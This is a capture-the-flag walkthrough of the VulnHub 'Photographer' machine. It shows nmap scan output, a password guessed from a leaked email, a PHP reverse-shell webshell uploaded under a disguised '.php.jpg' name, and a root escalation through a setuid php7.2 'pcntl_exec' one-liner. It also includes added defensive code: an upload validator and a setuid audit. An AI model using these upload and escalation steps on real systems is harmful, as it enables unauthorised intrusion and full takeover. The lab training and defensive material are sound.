Download link: https://download.vulnhub.com/photographer/Photographer.ova
Information gathering
root@kali:~# nmap -sC 192.168.243.155 --script=vuln
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-11 22:37 EDT
Nmap scan report for 192.168.243.155
Host is up (0.000080s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.243.155
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.243.155:80/elements.html
| Form id: name
| Form action: #
|
| Path: http://192.168.243.155:80/elements.html
| Form id: query
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /app/: Potentially interesting folder
| /content/: Potentially interesting folder
| /error/: Potentially interesting folder
| /home/: Potentially interesting folder
|_ /index/: Potentially interesting folder
|_http-passwd: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:FB:21:5E (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
SMB share service
Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <[email protected]>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <[email protected]>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
Visit port 80
Visit port 8000
https://www.exploit-db.com/exploits/48706
Directory enumeration
The email address should be [email protected], and the password is guessed to be babygirl
File upload
root@kali:/usr/share/webshells/php# cp php-reverse-shell.php /cheying.php.jpg
Modify the upload details and upload the webshell
Reverse shell
Privilege escalation
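The upload step above relies on a file named like cheying.php.jpg being accepted and later executed as PHP. The following is an added example (not code from the box's CMS or from this writeup) of a server-side upload validator that closes that gap: it rejects executable components anywhere in the name, checks the image magic bytes, and scans for a PHP open tag. The sample inputs are constructed.

```python
import re
import uuid
from typing import Tuple

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}
# Apache's mod_php handles these by type, so they may run even when they are
# not the last extension ("name.php.jpg"); reject them anywhere in the name.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for a candidate image upload."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    ext = parts[-1]
    if ext not in ALLOWED_IMAGE_EXT:
        return False, f"extension .{ext} not allowed"
    if any(p in EXECUTABLE_EXT for p in parts[:-1]):
        return False, "executable extension embedded in filename"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    if PHP_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Never keep the client's name: store under a random name + checked ext."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{uuid.uuid4().hex}.{ext}"


if __name__ == "__main__":
    # Constructed samples: a real-looking JPEG header and a disguised PHP file.
    good = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    disguised = b"\xff\xd8\xff\xe0" + b"<?php /* payload would go here */ ?>"
    print(validate_upload("photo.jpg", good))
    print(validate_upload("cheying.php.jpg", disguised))
    print(validate_upload("photo.jpg", disguised))
```

Store accepted files outside the web root or in a directory where the server is configured not to execute scripts.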
www-data@photographer:/home/daisa$ find / -perm -4000 2>/dev/null
/usr/bin/php7.2
Escalate privileges using the php command
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
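The root shell above exists only because an interpreter, /usr/bin/php7.2, carries the setuid bit. As an added example (not part of this writeup), the following audit walks a filesystem, flags any setuid interpreter as critical and any other setuid binary not in a baseline as a warning. The BASELINE set is a constructed, illustrative list of setuid binaries expected on a stock Ubuntu host, not a complete one.

```python
import os
import stat
from typing import Dict, List, Optional, Set, Tuple

# Basenames (version suffix stripped) that must never be setuid: a setuid
# interpreter runs arbitrary code as its owner, e.g. php7.2 -> root shell.
INTERPRETERS = {"php", "python", "perl", "ruby", "node", "lua",
                "bash", "sh", "dash", "zsh"}

# Constructed baseline (assumption): setuid files expected on a stock host.
BASELINE: Set[str] = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount",
    "/bin/umount", "/bin/ping", "/bin/fusermount",
}


def classify(path: str, mode: int, uid: int,
             baseline: Set[str] = BASELINE) -> Optional[str]:
    """Return a finding for a setuid file, or None if it is expected."""
    if not mode & stat.S_ISUID:
        return None
    base = os.path.basename(path).rstrip("0123456789.")  # php7.2 -> php
    if base in INTERPRETERS:
        return f"CRITICAL setuid interpreter {path} (owner uid {uid})"
    if path not in baseline:
        return f"WARN setuid binary {path} not in baseline (owner uid {uid})"
    return None


def audit_suid(root: str = "/") -> List[str]:
    """Walk root (no symlinks, no /proc) and collect setuid findings."""
    findings: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) != "/proc"]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                finding = classify(path, st.st_mode, st.st_uid)
                if finding:
                    findings.append(finding)
    return findings


if __name__ == "__main__":
    for line in audit_suid("/usr"):
        print(line)
```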